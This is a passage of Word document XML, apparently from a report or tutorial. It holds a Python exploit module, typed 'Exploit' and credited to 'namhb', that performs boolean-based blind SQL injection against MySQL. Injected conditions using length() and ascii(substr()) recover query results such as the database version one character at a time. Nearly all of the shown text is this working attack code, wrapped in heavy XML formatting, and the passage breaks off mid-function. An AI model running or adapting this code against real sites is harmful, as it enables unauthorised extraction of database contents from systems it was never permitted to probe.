              <w:t># Exploit level</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.type</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"Exploit"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Type: exploit | scanner | support</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.author</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"namhb"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.version</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"0.0.1"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.maxLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>255</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve"># self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>None</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.basicOptions["PATTERN"] </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"currentSetting"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>None,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"required"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>True,</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"description"</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"Pattern to check True/False"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>"if({0},1,0)"</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def getMySQLLength(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>for i in range(0, self.maxLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:lastRenderedPageBreak/>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Payload: 1 and and length(version)=i</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>" and length({0})={1}".format(query, i)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.checkQuery(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(result == True):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>i</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def getMySQLVersion(self):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Query = version()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Get MySQL version")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.runMySQLQuery("version()")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def runMySQLQuery(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Run query: {0}".format(query))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.getMySQLLength(query)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(self.resultLength == None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Can`t not get query!")</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>exit()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Result length: {0}".format(self.resultLength))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.getMySQLQueryResult(query)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>self.logger.info("Result: {0}".format(self.result))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># Clean result</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.resultLength </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>0</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">self.result </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>""</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>def getMySQLQueryResult(self, query):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t># First get length</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>if(self.resultLength != None):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>for i in range(0, self.resultLength):</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>for x in string.printable:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">asciiChar </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>ord(x)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">payload </w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>=</w:t>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t>" and ascii(substr({0},{1},1))={2}".format(query, (i+1), asciiChar)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00325E74" w:rsidRPr="00325E74" w:rsidRDefault="00325E74" w:rsidP="00325E74">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00325E74">
              <w:tab/>
              <w:t xml:space="preserve">result </w:t>
            </w:r>
